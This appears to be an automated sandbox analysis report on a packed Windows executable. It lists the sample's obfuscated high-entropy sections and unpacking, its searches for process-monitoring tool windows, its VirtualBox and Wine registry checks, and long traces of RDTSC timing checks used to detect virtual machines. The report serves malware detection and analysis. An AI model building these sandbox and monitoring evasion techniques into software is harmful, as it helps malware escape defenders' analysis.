            Source: file.exeStatic file information: File size 1851904 > 1048576
            Source: file.exeStatic PE information: Raw size of rlmvjdwl is bigger than: 0x100000 < 0x19a400

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rlmvjdwl:EW;gbnwhjnd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rlmvjdwl:EW;gbnwhjnd:EW;.taggant:EW;
            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
            Source: file.exeStatic PE information: real checksum: 0x1c7215 should be: 0x1ce702
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: rlmvjdwl
            Source: file.exeStatic PE information: section name: gbnwhjnd
            Source: file.exeStatic PE information: section name: .taggant
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_052E44B8 push cs; retf 0_3_052E44BA
            Source: file.exeStatic PE information: section name: entropy: 7.9816569167604365
            Source: file.exeStatic PE information: section name: rlmvjdwl entropy: 7.954044867111088

            Boot Survival

            barindex
            Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
            Tries to detect sandboxes / dynamic malware analysis system (registry check)
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FDA50 second address: 1FDA6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9F8B69BA4h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FDA6B second address: 1FDA76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FDA76 second address: 1FDA86 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE9F8B69BA2h 0x00000008 jp 00007FE9F8B69B96h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FDA86 second address: 1FDA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F8639 second address: 1F8643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE9F8B69B96h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FCA81 second address: 1FCAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9F881B0BFh 0x00000009 jl 00007FE9F881B0B6h 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 jng 00007FE9F881B0BEh 0x00000018 push edx 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FCAA7 second address: 1FCAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FE9F8B69B9Ch 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FCAB9 second address: 1FCABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FCABD second address: 1FCAC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FCC35 second address: 1FCC41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jns 00007FE9F881B0B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FCC41 second address: 1FCC58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA0h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FCC58 second address: 1FCC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FE9F881B0BAh 0x0000000d pushad 0x0000000e jmp 00007FE9F881B0C1h 0x00000013 jmp 00007FE9F881B0BAh 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FE9F881B0BBh 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FCC97 second address: 1FCCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE9F8B69B96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FCCA3 second address: 1FCCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FCDE0 second address: 1FCDEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE9F8B69B96h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FD2F9 second address: 1FD2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FD2FD second address: 1FD332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69B9Ch 0x00000007 jmp 00007FE9F8B69BA0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE9F8B69BA3h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 200448 second address: 20045F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9F881B0C3h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 20071E second address: 200724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 200724 second address: 200774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FE9F881B0C4h 0x0000000b pop ebx 0x0000000c popad 0x0000000d add dword ptr [esp], 7353C803h 0x00000014 push edx 0x00000015 movsx ecx, ax 0x00000018 pop ecx 0x00000019 push 00000003h 0x0000001b mov ch, 04h 0x0000001d push 00000000h 0x0000001f jp 00007FE9F881B0BCh 0x00000025 mov dword ptr [ebp+122D1A6Ch], eax 0x0000002b push 00000003h 0x0000002d mov edx, 0A54B59Ch 0x00000032 push 4349738Ch 0x00000037 push eax 0x00000038 push edx 0x00000039 jg 00007FE9F881B0B8h 0x0000003f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 200774 second address: 20077B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 20077B second address: 2007A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 7CB68C74h 0x0000000e lea ebx, dword ptr [ebp+1244733Ch] 0x00000014 sub dword ptr [ebp+122D19B3h], edx 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jp 00007FE9F881B0B8h 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21FA2B second address: 21FA37 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21FA37 second address: 21FA4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0C0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21FCB0 second address: 21FCDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE9F8B69B9Fh 0x0000000a jmp 00007FE9F8B69BA3h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21FCDB second address: 21FD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jmp 00007FE9F881B0C4h 0x00000011 pop edi 0x00000012 je 00007FE9F881B0BEh 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21FD06 second address: 21FD0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21FE46 second address: 21FE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21FE4C second address: 21FE64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9F8B69BA3h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21FE64 second address: 21FE7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 js 00007FE9F881B0B6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21FFC9 second address: 21FFCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22028C second address: 220290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 220290 second address: 22029F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jc 00007FE9F8B69B96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 220AB3 second address: 220AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jng 00007FE9F881B0BEh 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 220AD2 second address: 220AF3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE9F8B69BA1h 0x0000000f jo 00007FE9F8B69B96h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 220AF3 second address: 220AF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 214200 second address: 214208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 214208 second address: 21424A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jns 00007FE9F881B0B6h 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jnl 00007FE9F881B0B6h 0x00000018 jmp 00007FE9F881B0C1h 0x0000001d je 00007FE9F881B0B6h 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 popad 0x00000026 pushad 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 pushad 0x0000002a popad 0x0000002b push edx 0x0000002c pop edx 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 jne 00007FE9F881B0B6h 0x00000036 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F1A53 second address: 1F1A58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 220C33 second address: 220C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 220C39 second address: 220C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 221962 second address: 22196C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE9F881B0B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22196C second address: 221971 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 228033 second address: 228037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 228037 second address: 22805C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c jbe 00007FE9F8B69BAFh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE9F8B69BA1h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2291AA second address: 2291B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FE9F881B0B6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1EFFC9 second address: 1EFFCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1EFFCD second address: 1EFFEF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE9F881B0B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007FE9F881B0C0h 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1EFFEF second address: 1EFFFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FE9F8B69B96h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1EFFFB second address: 1EFFFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CCA3 second address: 22CCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CCA9 second address: 22CCBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007FE9F881B0B6h 0x0000000e jne 00007FE9F881B0B6h 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CCBE second address: 22CCE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 jmp 00007FE9F8B69BA4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007FE9F8B69BACh 0x00000015 pushad 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22D248 second address: 22D266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE9F881B0C8h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 231D84 second address: 231DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jne 00007FE9F8B69BABh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push ecx 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2320E5 second address: 2320E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2320E9 second address: 2320ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2322FF second address: 232303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 232303 second address: 232307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 232307 second address: 23230D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23230D second address: 232317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FE9F8B69B96h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 232317 second address: 232339 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f js 00007FE9F881B0B6h 0x00000015 pop edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2323D0 second address: 2323D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 232E57 second address: 232E70 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE9F881B0B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jnl 00007FE9F881B0B6h 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23349F second address: 2334A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2334A3 second address: 2334A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 233D5A second address: 233D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 234E39 second address: 234E43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FE9F881B0B6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 234E43 second address: 234E9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FE9F8B69B98h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 sub dword ptr [ebp+122D1A16h], ebx 0x0000002c push 00000000h 0x0000002e mov edi, dword ptr [ebp+122D3C87h] 0x00000034 push 00000000h 0x00000036 mov edi, dword ptr [ebp+122D2AF8h] 0x0000003c xchg eax, ebx 0x0000003d push edx 0x0000003e jg 00007FE9F8B69B9Ch 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 234E9D second address: 234EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FE9F881B0B8h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 235814 second address: 23581A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2361B0 second address: 2361C6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE9F881B0BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
